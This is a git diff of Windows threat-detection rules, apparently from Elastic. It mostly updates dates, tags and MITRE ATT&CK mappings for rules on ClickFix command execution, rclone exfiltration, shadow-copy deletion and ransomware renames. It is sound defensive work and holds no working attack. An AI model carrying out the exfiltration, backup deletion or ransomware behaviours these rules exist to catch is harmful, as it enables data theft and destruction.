"event.ingested" type = "eql" @@ -161,19 +149,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml index f2fdff5ae2b..da0f6bf4dc8 100644 --- a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml +++ b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,19 +57,7 @@ note = """## Triage and analysis risk_score = 73 rule_id = "fbad57ec-4442-48db-a34f-5ee907b44a22" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Windows Security Event Logs", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -84,61 +72,51 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.004" +name = "Malicious Copy and Paste" +reference = "https://attack.mitre.org/techniques/T1204/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" \ No newline at end of file +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_windows_phish_clickfix.toml b/rules/windows/execution_windows_phish_clickfix.toml index 499cedf6295..ea6bea70489 100644 --- a/rules/windows/execution_windows_phish_clickfix.toml +++ b/rules/windows/execution_windows_phish_clickfix.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,20 +53,7 @@ references = ["https://mrd0x.com/filefix-clickfix-alternative/"] risk_score = 73 rule_id = "7dc45430-7407-4790-b89e-c857c3f6bf23" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Data Source: Windows Security Event Logs", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -83,61 +70,23 @@ not (process.name : "rundll32.exe" and process.args : ("ndfapi.dll,NdfRunDllDiag [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" [[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" +[[rule.threat.technique.subtechnique]] +id = "T1204.004" +name = "Malicious Copy and Paste" +reference = "https://attack.mitre.org/techniques/T1204/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/execution_windows_powershell_susp_args.toml b/rules/windows/execution_windows_powershell_susp_args.toml index ff0cfea3021..1678f421920 100644 --- a/rules/windows/execution_windows_powershell_susp_args.toml +++ b/rules/windows/execution_windows_powershell_susp_args.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ PowerShell is a powerful scripting language and command-line shell used for task risk_score = 47 rule_id = "83bf249e-4348-47ba-9741-1202a09556ad" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Windows Security Event Logs", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -186,19 +173,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/execution_windows_script_from_internet.toml b/rules/windows/execution_windows_script_from_internet.toml index b0f8b6c40d2..2f9e2dc686d 100644 --- a/rules/windows/execution_windows_script_from_internet.toml +++ b/rules/windows/execution_windows_script_from_internet.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/31" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" min_stack_version = "9.1.0" min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases." @@ -20,14 +20,7 @@ name = "Execution of a Downloaded Windows Script" risk_score = 47 rule_id = "79543b00-28a5-4461-81ac-644c4dc4012f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -88,38 +81,11 @@ Windows scripts, often used for legitimate automation tasks, can be exploited by [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" @@ -130,10 +96,40 @@ id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/exfiltration_rclone_cloud_upload.toml b/rules/windows/exfiltration_rclone_cloud_upload.toml index 48377c25e27..0623bb45aa5 100644 --- a/rules/windows/exfiltration_rclone_cloud_upload.toml +++ b/rules/windows/exfiltration_rclone_cloud_upload.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,11 +84,17 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/windows/exfiltration_smb_rare_destination.toml b/rules/windows/exfiltration_smb_rare_destination.toml index 1e007cf4c87..4c2598205f8 100644 --- a/rules/windows/exfiltration_smb_rare_destination.toml +++ b/rules/windows/exfiltration_smb_rare_destination.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,18 +61,7 @@ references = ["https://www.securify.nl/en/blog/living-off-the-land-stealing-netn risk_score = 47 rule_id = "f580bf0a-2d23-43bb-b8e1-17548bb947ec" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -117,17 +106,16 @@ event.category:network and host.os.type:windows and process.pid:4 and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["destination.ip"] diff --git a/rules/windows/impact_backup_file_deletion.toml b/rules/windows/impact_backup_file_deletion.toml index 445c8897378..18ea2498d68 100644 --- a/rules/windows/impact_backup_file_deletion.toml +++ b/rules/windows/impact_backup_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/01" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,19 +107,13 @@ file where host.os.type == "windows" and event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml index 8c1e77cc3b5..680f7b7dad8 100644 --- a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml +++ b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/05/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,19 +93,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/windows/impact_high_freq_file_renames_by_kernel.toml b/rules/windows/impact_high_freq_file_renames_by_kernel.toml index e2d3edbbce1..ef82bc6c119 100644 --- a/rules/windows/impact_high_freq_file_renames_by_kernel.toml +++ b/rules/windows/impact_high_freq_file_renames_by_kernel.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,14 +54,7 @@ references = ["https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomwa risk_score = 47 rule_id = "1397e1b9-0c90-4d24-8d7b-80598eb9bc9a" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide", - "Data Source: Elastic Defend" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "esql" @@ -86,22 +79,25 @@ from logs-endpoint.events.file-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" @@ -111,5 +107,3 @@ reference = "https://attack.mitre.org/techniques/T1021/002/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - - diff --git a/rules/windows/impact_mod_critical_os_files.toml b/rules/windows/impact_mod_critical_os_files.toml index 7aa911b6309..96426b8ec98 100644 --- a/rules/windows/impact_mod_critical_os_files.toml +++ b/rules/windows/impact_mod_critical_os_files.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,20 +55,7 @@ This rule identifies attempts to delete or modify critical files used during the risk_score = 73 rule_id = "1a3f2a4c-12d0-4b88-961a-2711ee295637" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Impact", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -93,18 +80,23 @@ file where host.os.type == "windows" and event.type in ("change", "deletion") an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" + [[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/windows/impact_ransomware_file_rename_smb.toml b/rules/windows/impact_ransomware_file_rename_smb.toml index 7f585c29ae5..7134610ebc1 100644 --- a/rules/windows/impact_ransomware_file_rename_smb.toml +++ b/rules/windows/impact_ransomware_file_rename_smb.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,14 +55,7 @@ references = ["https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomwa risk_score = 73 rule_id = "78e9b5d5-7c07-40a7-a591-3dbbf464c386" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -82,36 +75,31 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/impact_ransomware_note_file_over_smb.toml b/rules/windows/impact_ransomware_note_file_over_smb.toml index 392a87fdba2..e37debd4886 100644 --- a/rules/windows/impact_ransomware_note_file_over_smb.toml +++ b/rules/windows/impact_ransomware_note_file_over_smb.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,14 +55,7 @@ note = """## Triage and analysis risk_score = 73 rule_id = "02bab13d-fb14-4d7c-b6fe-4a28874d37c5" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -82,36 +75,31 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml index 073eef3b42a..ea585c8adc0 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml +++ b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -118,31 +118,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml index 3298b577ca8..16078000044 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml +++ b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -112,26 +112,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml index 83b0ab0edd9..5fa8548e79a 100644 --- a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml +++ b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/03" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,14 +63,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: 